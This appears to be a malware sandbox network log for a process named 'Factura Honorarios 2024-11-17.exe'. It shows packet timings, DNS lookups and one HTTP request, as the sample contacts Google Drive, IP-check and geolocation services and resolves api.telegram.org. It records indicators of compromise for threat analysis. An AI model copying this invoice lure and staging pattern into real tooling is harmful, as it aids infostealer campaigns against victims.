                                                                                                                                Nov 18, 2024 13:50:51.302411079 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:51.347744942 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:51.347898006 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:51.348119974 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:51.348191977 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:51.348320961 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:51.348485947 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:51.363171101 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:51.363344908 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:51.363356113 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:51.363430977 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:51.368514061 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:51.368585110 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:51.368679047 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:51.368752956 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:51.372865915 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:51.372946024 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:51.375540972 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:51.375648975 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:51.375730991 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:51.375838041 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:51.377942085 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:51.378120899 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:51.419238091 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:51.419336081 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:51.419352055 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:51.419398069 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:51.465090036 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:51.465157032 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:51.465392113 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:51.465442896 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:51.465455055 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:51.465604067 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:51.479870081 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:51.479929924 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:51.479950905 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:51.480120897 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:51.485475063 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:51.485795975 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:51.485810995 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:51.485924959 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:51.486148119 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:51.486321926 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:51.486329079 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:51.486391068 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:51.489423037 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:51.491230965 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:51.492392063 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:51.492458105 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:51.492548943 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:51.492594957 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:51.535729885 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:51.535779953 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:51.535830975 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:51.535963058 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:51.582855940 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:51.583010912 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:51.583044052 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:51.583228111 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:51.602489948 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:51.602797985 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:51.602816105 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:51.603020906 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:51.603077888 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:51.603162050 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:51.603168011 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:51.603245020 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:51.603250027 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:51.603332043 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:51.603956938 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:51.604017973 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:51.609349012 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:51.609543085 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:51.609549046 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:51.609713078 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:51.653305054 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:51.653414965 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:51.653466940 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:51.654233932 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:51.699230909 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:51.699326038 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:51.699465036 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:51.699465990 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:51.699511051 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:51.699580908 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:51.699592113 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:51.699666977 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:51.700059891 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:51.700119019 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:51.719700098 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:51.719877958 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:51.719906092 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:51.719964027 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:51.719974041 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:51.720026016 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:51.720032930 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:51.720136881 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:51.720794916 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:51.721088886 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:51.721096039 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:51.721148014 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:51.726257086 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:51.726383924 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:51.726578951 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:51.726651907 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:51.769736052 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:51.769835949 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:51.769871950 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:51.769953012 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:51.822846889 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:51.822916031 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:51.822993040 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:51.822993040 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:51.823033094 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:51.823117971 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:51.823359966 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:51.823417902 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:51.836385965 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:51.836518049 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:51.836544991 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:51.836642027 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:51.836745024 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:51.836790085 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:51.837147951 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:51.837209940 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:51.837234020 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:53.574695110 CET4971180192.168.2.8193.122.6.168
                                                                                                                                Nov 18, 2024 13:50:53.579705954 CET8049711193.122.6.168192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:53.579806089 CET4971180192.168.2.8193.122.6.168
                                                                                                                                Nov 18, 2024 13:50:53.580066919 CET4971180192.168.2.8193.122.6.168
                                                                                                                                Nov 18, 2024 13:50:53.584940910 CET8049711193.122.6.168192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:54.414751053 CET8049711193.122.6.168192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:54.421840906 CET4971180192.168.2.8193.122.6.168
                                                                                                                                Nov 18, 2024 13:50:54.426810980 CET8049711193.122.6.168192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:55.665736914 CET8049711193.122.6.168192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:55.714204073 CET4971180192.168.2.8193.122.6.168
                                                                                                                                Nov 18, 2024 13:50:56.126080036 CET49714443192.168.2.8188.114.97.3
                                                                                                                                Nov 18, 2024 13:50:56.126154900 CET44349714188.114.97.3192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:56.126231909 CET49714443192.168.2.8188.114.97.3
                                                                                                                                Nov 18, 2024 13:50:56.146401882 CET49714443192.168.2.8188.114.97.3
                                                                                                                                Nov 18, 2024 13:50:56.146471977 CET44349714188.114.97.3192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:56.761554956 CET44349714188.114.97.3192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:56.761657000 CET49714443192.168.2.8188.114.97.3
                                                                                                                                Nov 18, 2024 13:50:56.767184973 CET49714443192.168.2.8188.114.97.3
                                                                                                                                Nov 18, 2024 13:50:56.767219067 CET44349714188.114.97.3192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:56.767586946 CET44349714188.114.97.3192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:56.779686928 CET49714443192.168.2.8188.114.97.3
                                                                                                                                Nov 18, 2024 13:50:56.823339939 CET44349714188.114.97.3192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:56.928498030 CET44349714188.114.97.3192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:56.928601980 CET44349714188.114.97.3192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:56.928668022 CET49714443192.168.2.8188.114.97.3
                                                                                                                                Nov 18, 2024 13:50:56.934890032 CET49714443192.168.2.8188.114.97.3
                                                                                                                                Nov 18, 2024 13:50:56.942181110 CET4971180192.168.2.8193.122.6.168
                                                                                                                                Nov 18, 2024 13:50:56.947156906 CET8049711193.122.6.168192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:59.186085939 CET8049711193.122.6.168192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:59.188227892 CET49715443192.168.2.8188.114.97.3
                                                                                                                                Nov 18, 2024 13:50:59.188297033 CET44349715188.114.97.3192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:59.188373089 CET49715443192.168.2.8188.114.97.3
                                                                                                                                Nov 18, 2024 13:50:59.188671112 CET49715443192.168.2.8188.114.97.3
                                                                                                                                Nov 18, 2024 13:50:59.188683987 CET44349715188.114.97.3192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:59.229899883 CET4971180192.168.2.8193.122.6.168
                                                                                                                                Nov 18, 2024 13:50:59.824489117 CET44349715188.114.97.3192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:59.830641985 CET49715443192.168.2.8188.114.97.3
                                                                                                                                Nov 18, 2024 13:50:59.830698013 CET44349715188.114.97.3192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:59.975434065 CET44349715188.114.97.3192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:59.975526094 CET44349715188.114.97.3192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:59.975668907 CET49715443192.168.2.8188.114.97.3
                                                                                                                                Nov 18, 2024 13:50:59.976141930 CET49715443192.168.2.8188.114.97.3
                                                                                                                                Nov 18, 2024 13:50:59.979465008 CET4971180192.168.2.8193.122.6.168
                                                                                                                                Nov 18, 2024 13:50:59.980515957 CET4971680192.168.2.8193.122.6.168
                                                                                                                                Nov 18, 2024 13:50:59.984970093 CET8049711193.122.6.168192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:59.985142946 CET4971180192.168.2.8193.122.6.168
                                                                                                                                Nov 18, 2024 13:50:59.985399008 CET8049716193.122.6.168192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:59.985485077 CET4971680192.168.2.8193.122.6.168
                                                                                                                                Nov 18, 2024 13:50:59.985692978 CET4971680192.168.2.8193.122.6.168
                                                                                                                                Nov 18, 2024 13:50:59.990681887 CET8049716193.122.6.168192.168.2.8
                                                                                                                                Nov 18, 2024 13:51:00.820605993 CET8049716193.122.6.168192.168.2.8
                                                                                                                                Nov 18, 2024 13:51:00.821788073 CET49717443192.168.2.8188.114.97.3
                                                                                                                                Nov 18, 2024 13:51:00.821832895 CET44349717188.114.97.3192.168.2.8
                                                                                                                                Nov 18, 2024 13:51:00.821908951 CET49717443192.168.2.8188.114.97.3
                                                                                                                                Nov 18, 2024 13:51:00.822163105 CET49717443192.168.2.8188.114.97.3
                                                                                                                                Nov 18, 2024 13:51:00.822176933 CET44349717188.114.97.3192.168.2.8
                                                                                                                                Nov 18, 2024 13:51:00.870450020 CET4971680192.168.2.8193.122.6.168
                                                                                                                                Nov 18, 2024 13:51:01.432084084 CET44349717188.114.97.3192.168.2.8
                                                                                                                                Nov 18, 2024 13:51:01.433840036 CET49717443192.168.2.8188.114.97.3
                                                                                                                                Nov 18, 2024 13:51:01.433876038 CET44349717188.114.97.3192.168.2.8
                                                                                                                                Nov 18, 2024 13:51:01.578021049 CET44349717188.114.97.3192.168.2.8
                                                                                                                                Nov 18, 2024 13:51:01.578089952 CET44349717188.114.97.3192.168.2.8
                                                                                                                                Nov 18, 2024 13:51:01.578161955 CET49717443192.168.2.8188.114.97.3
                                                                                                                                Nov 18, 2024 13:51:01.578706980 CET49717443192.168.2.8188.114.97.3
                                                                                                                                Nov 18, 2024 13:51:01.582681894 CET4971880192.168.2.8193.122.6.168
                                                                                                                                Nov 18, 2024 13:51:01.587723970 CET8049718193.122.6.168192.168.2.8
                                                                                                                                Nov 18, 2024 13:51:01.587884903 CET4971880192.168.2.8193.122.6.168
                                                                                                                                Nov 18, 2024 13:51:01.592613935 CET4971880192.168.2.8193.122.6.168
                                                                                                                                Nov 18, 2024 13:51:01.597523928 CET8049718193.122.6.168192.168.2.8
                                                                                                                                Nov 18, 2024 13:51:02.421680927 CET8049718193.122.6.168192.168.2.8
                                                                                                                                Nov 18, 2024 13:51:02.423175097 CET49719443192.168.2.8188.114.97.3
                                                                                                                                Nov 18, 2024 13:51:02.423227072 CET44349719188.114.97.3192.168.2.8
                                                                                                                                Nov 18, 2024 13:51:02.423450947 CET49719443192.168.2.8188.114.97.3
                                                                                                                                Nov 18, 2024 13:51:02.423587084 CET49719443192.168.2.8188.114.97.3
                                                                                                                                Nov 18, 2024 13:51:02.423599958 CET44349719188.114.97.3192.168.2.8
                                                                                                                                Nov 18, 2024 13:51:02.464282036 CET4971880192.168.2.8193.122.6.168
                                                                                                                                Nov 18, 2024 13:51:03.029733896 CET44349719188.114.97.3192.168.2.8
                                                                                                                                Nov 18, 2024 13:51:03.031383991 CET49719443192.168.2.8188.114.97.3
                                                                                                                                Nov 18, 2024 13:51:03.031450987 CET44349719188.114.97.3192.168.2.8
                                                                                                                                Nov 18, 2024 13:51:03.171169043 CET44349719188.114.97.3192.168.2.8
                                                                                                                                Nov 18, 2024 13:51:03.171233892 CET44349719188.114.97.3192.168.2.8
                                                                                                                                Nov 18, 2024 13:51:03.171410084 CET49719443192.168.2.8188.114.97.3
                                                                                                                                Nov 18, 2024 13:51:03.171888113 CET49719443192.168.2.8188.114.97.3
                                                                                                                                Nov 18, 2024 13:51:03.175932884 CET4971880192.168.2.8193.122.6.168
                                                                                                                                Nov 18, 2024 13:51:03.176616907 CET4972080192.168.2.8193.122.6.168
                                                                                                                                Nov 18, 2024 13:51:03.181615114 CET8049718193.122.6.168192.168.2.8
                                                                                                                                Nov 18, 2024 13:51:03.181715012 CET8049720193.122.6.168192.168.2.8
                                                                                                                                Nov 18, 2024 13:51:03.181744099 CET4971880192.168.2.8193.122.6.168
                                                                                                                                Nov 18, 2024 13:51:03.181787968 CET4972080192.168.2.8193.122.6.168
                                                                                                                                Nov 18, 2024 13:51:03.181866884 CET4972080192.168.2.8193.122.6.168
                                                                                                                                Nov 18, 2024 13:51:03.186765909 CET8049720193.122.6.168192.168.2.8
                                                                                                                                Nov 18, 2024 13:51:05.026211023 CET8049720193.122.6.168192.168.2.8
                                                                                                                                Nov 18, 2024 13:51:05.027721882 CET49721443192.168.2.8188.114.97.3
                                                                                                                                Nov 18, 2024 13:51:05.027762890 CET44349721188.114.97.3192.168.2.8
                                                                                                                                Nov 18, 2024 13:51:05.027833939 CET49721443192.168.2.8188.114.97.3
                                                                                                                                Nov 18, 2024 13:51:05.028120995 CET49721443192.168.2.8188.114.97.3
                                                                                                                                Nov 18, 2024 13:51:05.028136015 CET44349721188.114.97.3192.168.2.8
                                                                                                                                Nov 18, 2024 13:51:05.073640108 CET4972080192.168.2.8193.122.6.168
                                                                                                                                Nov 18, 2024 13:51:05.642682076 CET44349721188.114.97.3192.168.2.8
                                                                                                                                Nov 18, 2024 13:51:05.644263029 CET49721443192.168.2.8188.114.97.3
                                                                                                                                Nov 18, 2024 13:51:05.644295931 CET44349721188.114.97.3192.168.2.8
                                                                                                                                Nov 18, 2024 13:51:05.788203001 CET44349721188.114.97.3192.168.2.8
                                                                                                                                Nov 18, 2024 13:51:05.788351059 CET44349721188.114.97.3192.168.2.8
                                                                                                                                Nov 18, 2024 13:51:05.788410902 CET49721443192.168.2.8188.114.97.3
                                                                                                                                Nov 18, 2024 13:51:05.789390087 CET49721443192.168.2.8188.114.97.3
                                                                                                                                Nov 18, 2024 13:51:05.797550917 CET4972080192.168.2.8193.122.6.168
                                                                                                                                Nov 18, 2024 13:51:05.799194098 CET4972280192.168.2.8193.122.6.168
                                                                                                                                Nov 18, 2024 13:51:05.805663109 CET8049722193.122.6.168192.168.2.8
                                                                                                                                Nov 18, 2024 13:51:05.805753946 CET4972280192.168.2.8193.122.6.168
                                                                                                                                Nov 18, 2024 13:51:05.805912018 CET4972280192.168.2.8193.122.6.168
                                                                                                                                Nov 18, 2024 13:51:05.813718081 CET8049722193.122.6.168192.168.2.8
                                                                                                                                Nov 18, 2024 13:51:05.826493979 CET8049720193.122.6.168192.168.2.8
                                                                                                                                Nov 18, 2024 13:51:05.826622963 CET4972080192.168.2.8193.122.6.168
                                                                                                                                Nov 18, 2024 13:51:06.654702902 CET8049722193.122.6.168192.168.2.8
                                                                                                                                Nov 18, 2024 13:51:06.655998945 CET49723443192.168.2.8188.114.97.3
                                                                                                                                Nov 18, 2024 13:51:06.656052113 CET44349723188.114.97.3192.168.2.8
                                                                                                                                Nov 18, 2024 13:51:06.656116009 CET49723443192.168.2.8188.114.97.3
                                                                                                                                Nov 18, 2024 13:51:06.656382084 CET49723443192.168.2.8188.114.97.3
                                                                                                                                Nov 18, 2024 13:51:06.656394958 CET44349723188.114.97.3192.168.2.8
                                                                                                                                Nov 18, 2024 13:51:06.698632956 CET4972280192.168.2.8193.122.6.168
                                                                                                                                Nov 18, 2024 13:51:07.264532089 CET44349723188.114.97.3192.168.2.8
                                                                                                                                Nov 18, 2024 13:51:07.266194105 CET49723443192.168.2.8188.114.97.3
                                                                                                                                Nov 18, 2024 13:51:07.266236067 CET44349723188.114.97.3192.168.2.8
                                                                                                                                Nov 18, 2024 13:51:07.409559965 CET44349723188.114.97.3192.168.2.8
                                                                                                                                Nov 18, 2024 13:51:07.409713030 CET44349723188.114.97.3192.168.2.8
                                                                                                                                Nov 18, 2024 13:51:07.409787893 CET49723443192.168.2.8188.114.97.3
                                                                                                                                Nov 18, 2024 13:51:07.410135984 CET49723443192.168.2.8188.114.97.3
                                                                                                                                Nov 18, 2024 13:51:07.414000988 CET4972280192.168.2.8193.122.6.168
                                                                                                                                Nov 18, 2024 13:51:07.415416956 CET4972480192.168.2.8193.122.6.168
                                                                                                                                Nov 18, 2024 13:51:07.419246912 CET8049722193.122.6.168192.168.2.8
                                                                                                                                Nov 18, 2024 13:51:07.419331074 CET4972280192.168.2.8193.122.6.168
                                                                                                                                Nov 18, 2024 13:51:07.420336962 CET8049724193.122.6.168192.168.2.8
                                                                                                                                Nov 18, 2024 13:51:07.420423031 CET4972480192.168.2.8193.122.6.168
                                                                                                                                Nov 18, 2024 13:51:07.420520067 CET4972480192.168.2.8193.122.6.168
                                                                                                                                Nov 18, 2024 13:51:07.425276041 CET8049724193.122.6.168192.168.2.8
                                                                                                                                Nov 18, 2024 13:51:09.265789986 CET8049724193.122.6.168192.168.2.8
                                                                                                                                Nov 18, 2024 13:51:09.267370939 CET49725443192.168.2.8188.114.97.3
                                                                                                                                Nov 18, 2024 13:51:09.267415047 CET44349725188.114.97.3192.168.2.8
                                                                                                                                Nov 18, 2024 13:51:09.267519951 CET49725443192.168.2.8188.114.97.3
                                                                                                                                Nov 18, 2024 13:51:09.267823935 CET49725443192.168.2.8188.114.97.3
                                                                                                                                Nov 18, 2024 13:51:09.267837048 CET44349725188.114.97.3192.168.2.8
                                                                                                                                Nov 18, 2024 13:51:09.307984114 CET4972480192.168.2.8193.122.6.168
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 18, 2024 13:50:45.519604921 CET | 192.168.2.8 | 1.1.1.1 | 0x4b71 | Standard query (0) | drive.google.com | A (IP address) | IN (0x0001) | false
Nov 18, 2024 13:50:47.512814045 CET | 192.168.2.8 | 1.1.1.1 | 0x9620 | Standard query (0) | drive.usercontent.google.com | A (IP address) | IN (0x0001) | false
Nov 18, 2024 13:50:53.560709953 CET | 192.168.2.8 | 1.1.1.1 | 0x3206 | Standard query (0) | checkip.dyndns.org | A (IP address) | IN (0x0001) | false
Nov 18, 2024 13:50:56.117856979 CET | 192.168.2.8 | 1.1.1.1 | 0xebd8 | Standard query (0) | reallyfreegeoip.org | A (IP address) | IN (0x0001) | false
Nov 18, 2024 13:51:13.585165024 CET | 192.168.2.8 | 1.1.1.1 | 0x2cd7 | Standard query (0) | api.telegram.org | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 18, 2024 13:50:45.526700020 CET | 1.1.1.1 | 192.168.2.8 | 0x4b71 | No error (0) | drive.google.com | - | 142.250.185.174 | A (IP address) | IN (0x0001) | false
Nov 18, 2024 13:50:47.519742966 CET | 1.1.1.1 | 192.168.2.8 | 0x9620 | No error (0) | drive.usercontent.google.com | - | 172.217.16.193 | A (IP address) | IN (0x0001) | false
Nov 18, 2024 13:50:53.569175005 CET | 1.1.1.1 | 192.168.2.8 | 0x3206 | No error (0) | checkip.dyndns.org | checkip.dyndns.com | - | CNAME (Canonical name) | IN (0x0001) | false
Nov 18, 2024 13:50:53.569175005 CET | 1.1.1.1 | 192.168.2.8 | 0x3206 | No error (0) | checkip.dyndns.com | - | 193.122.6.168 | A (IP address) | IN (0x0001) | false
Nov 18, 2024 13:50:53.569175005 CET | 1.1.1.1 | 192.168.2.8 | 0x3206 | No error (0) | checkip.dyndns.com | - | 132.226.247.73 | A (IP address) | IN (0x0001) | false
Nov 18, 2024 13:50:53.569175005 CET | 1.1.1.1 | 192.168.2.8 | 0x3206 | No error (0) | checkip.dyndns.com | - | 132.226.8.169 | A (IP address) | IN (0x0001) | false
Nov 18, 2024 13:50:53.569175005 CET | 1.1.1.1 | 192.168.2.8 | 0x3206 | No error (0) | checkip.dyndns.com | - | 193.122.130.0 | A (IP address) | IN (0x0001) | false
Nov 18, 2024 13:50:53.569175005 CET | 1.1.1.1 | 192.168.2.8 | 0x3206 | No error (0) | checkip.dyndns.com | - | 158.101.44.242 | A (IP address) | IN (0x0001) | false
Nov 18, 2024 13:50:56.125507116 CET | 1.1.1.1 | 192.168.2.8 | 0xebd8 | No error (0) | reallyfreegeoip.org | - | 188.114.97.3 | A (IP address) | IN (0x0001) | false
Nov 18, 2024 13:50:56.125507116 CET | 1.1.1.1 | 192.168.2.8 | 0xebd8 | No error (0) | reallyfreegeoip.org | - | 188.114.96.3 | A (IP address) | IN (0x0001) | false
Nov 18, 2024 13:51:13.592521906 CET | 1.1.1.1 | 192.168.2.8 | 0x2cd7 | No error (0) | api.telegram.org | - | 149.154.167.220 | A (IP address) | IN (0x0001) | false
                                                                                                                                • drive.google.com
                                                                                                                                • drive.usercontent.google.com
                                                                                                                                • reallyfreegeoip.org
                                                                                                                                • api.telegram.org
                                                                                                                                • checkip.dyndns.org
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.8 | 49711 | 193.122.6.168 | 80 | 7628 | C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 13:50:53.580066919 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Nov 18, 2024 13:50:54.414751053 CET | 323 | IN | HTTP/1.1 200 OK
Date: Mon, 18 Nov 2024 12:50:54 GMT
Content-Type: text/html
Content-Length: 106
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 4ab9c707e1c18dd86eb0ff7c1892786c
